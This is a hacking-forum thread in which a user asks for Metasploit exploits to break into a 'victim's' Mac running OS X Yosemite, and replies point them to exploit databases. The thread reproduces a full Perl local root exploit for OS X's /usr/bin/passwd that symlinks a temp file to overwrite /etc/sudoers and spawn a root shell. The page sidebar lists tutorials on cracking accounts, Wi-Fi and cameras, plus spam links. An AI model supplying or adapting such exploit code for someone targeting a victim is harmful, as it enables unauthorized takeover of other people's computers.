Well, I started to use metasploit and I tried to search some exploits for Mac OS X Yosemite, but there were nothing. Is the OS too safe to get hacked with metasploit or what's the problem? I really want to solve this problem, cause my victims Computer is running on OSX. Any Ideas?
Forum Thread: Any Exploits for Mac OSX?
- Hot
- Active
-
Forum Thread:
The Only Authentic Way to Hack Instagram!
39
Replies
4 min ago -
Forum Thread:
nutritioun.com/151/keto-bhb-real/
0
Replies
4 hrs ago -
Forum Thread:
Folks Who Consume Masses but In
0
Replies
5 hrs ago -
Forum Thread:
Improved One serving a day
0
Replies
7 hrs ago -
Forum Thread:
debbiesmiracles.com/Luma-Clear-Serum/
0
Replies
9 hrs ago -
Forum Thread:
WIRELESS ADAPTER STOPPED WORKING VIRTUAL BOX KALI LINUX
0
Replies
9 hrs ago -
How to:
Crack Instagram Passwords Using Instainsane
21
Replies
19 hrs ago -
Forum Thread:
How to Hack CCTV Private Cameras
64
Replies
23 hrs ago -
Forum Thread:
Create and Use Android/Meterpreter/reverse_tcp APK with Msfvenom?
101
Replies
1 day ago -
Forum Thread:
How to Hack Anonymously Using Airgeddon?
2
Replies
1 day ago -
Forum Thread:
Body and Improves the Digestion
0
Replies
1 day ago -
Forum Thread:
www.autobodycu.org/Befit-Keto-Cut/
0
Replies
1 day ago -
Forum Thread:
Where Do I Get the Python Used in All Null Byte Tutorials?
2
Replies
1 day ago -
Forum Thread:
Tips on Networking 101
0
Replies
1 day ago -
Forum Thread:
How to Get Proxychains to Work?
13
Replies
2 days ago -
Forum Thread:
Use Hikxploit to Hack Hikvision Security Cameras
3
Replies
2 days ago -
Forum Thread:
How to hack Wi-Fi anonymously using Airgeddon?
0
Replies
4 days ago -
Communtiy Discussion:
Watchdogs Hacking
30
Replies
4 days ago -
Forum Thread:
Am Having Problems Creating a Session on Meterpreter
0
Replies
4 days ago -
Forum Thread:
How to Hack into a WiFi Network Without Any Packets Sent
0
Replies
5 days ago
-
Hacking Windows 10:
How to Use SSH Tunnels to Forward Requests & Hack Remote Routers
-
How to Hack with Arduino:
Tracking Which Networks a Mac Has Connected To & When
-
How To:
Spy on SSH Sessions with SSHPry2.0
-
How To:
Crack Wi-Fi Passwords with Your Android Phone and Get Free Internet!
-
How to Hack Wi-Fi:
Cracking WPA2 Passwords Using the New PMKID Hashcat Attack
-
Hack Like a Pro:
How to Hack Facebook (Facebook Password Extractor)
-
How To:
Top 10 Things to Do After Installing Kali Linux
-
How To:
Hack Android Using Kali (Remotely)
-
How To:
Automate Wi-Fi Hacking with Wifite2
-
How to Hack Wi-Fi:
Cracking WPA2-PSK Passwords Using Aircrack-Ng
-
How to Hack Wi-Fi:
Get Anyone's Wi-Fi Password Without Cracking Using Wifiphisher
-
How To:
4 Ways to Crack a Facebook Password & How to Protect Yourself from Them
-
Android for Hackers:
How to Turn an Android Phone into a Hacking Device Without Root
-
How To:
Buy the Best Wireless Network Adapter for Wi-Fi Hacking in 2019
-
How To:
Hack WPA & WPA2 Wi-Fi Passwords with a Pixie-Dust Attack Using Airgeddon
-
How To:
Brute-Force Nearly Any Website Login with Hatch
-
How To:
Phish for Social Media & Other Account Passwords with BlackEye
-
How to Hack Wi-Fi:
Stealing Wi-Fi Passwords with an Evil Twin Attack
-
How To:
Crack Any Master Combination Lock in 8 Tries or Less Using This Calculator
-
How To:
Crack Shadow Hashes After Getting Root on a Linux System
4 Responses
There are numerous exploits for OS X in Metasploit. Look again. In addition, check exploitdb for exploits or securityfocus.com. There are numerous exploits for OS X. It is far from safe!
Yeah, thanks. But with which kind of program do I use script like this:
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
#!/usr/bin/perl
#
# /usr/bin/passwdOSX: local root exploit.
#
# by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)
#
# (Apple) OSX's /usr/bin/passwd program has support for a custom
# passwd file to be used instead of the standard/static path. this
# feature has security issues in the form of editable file(s) being
# made anywheres on the disk and also writing arbitrary data to files.
#
# the first issue will only work if the file does not already exist,
# it is done using "umask 0;/usr/bin/passwd -i file -l <filename>".
# the second issue is once a successful password change has occured
# /usr/bin/passwd will insecurely re-write the passwd file to
# /tmp/.pwtmp.<pid>, which can be predicted and linked to a file of
# your choice. (this exploits the second issue to overwrite
# /etc/sudoers)
#
# (for some reason this took apple 6 or so months to patch)
use POSIX;
$fakepasswd="/tmp/xpasswd.$$";
$passwdpid=($$ + 1);
$passwdtempfile="/tmp/.pwtmp.$passwdpid";
$sudoers="/etc/sudoers";
sub pexit{print("! @.\n");exit(1);}
print("* /usr/bin/passwdOSX: local root exploit.\n");
print("* by: vade79/v9 v9\@fakehalo.us (fakehalo/realhalo)\n\n");
unlink($fakepasswd);
print("* making fake password file. ($fakepasswd)\n");
open(FP,">$fakepasswd")||pexit("couldn't open/write to $fakepasswd");
# uid must equal the current user.
print(FP "ALL ALL=(ALL) ALL #::" . getuid . ":" . getuid . "::" .
getuid . ":" . getuid . "::/:/\n");
close(FP);
print("* sym-linking $sudoers -> $passwdtempfile.\n");
symlink($sudoers,$passwdtempfile)||pexit("couldn't link files.");
print("* running /usr/bin/passwd on $fakepasswd.\n");
print("* (use ANY password longer than 4 characters)\n\n");
system("/usr/bin/passwd -i file -l $fakepasswd \"ALL ALL=(ALL) ALL #\"");
print("\n* running \"sudo sh\", use your REAL (user) password.\n\n");
system("/usr/bin/sudo sh");
exit(0);
That is a Perl script.
Security Focus is what I use. Sometimes they have the exploits already there.
Share Your Thoughts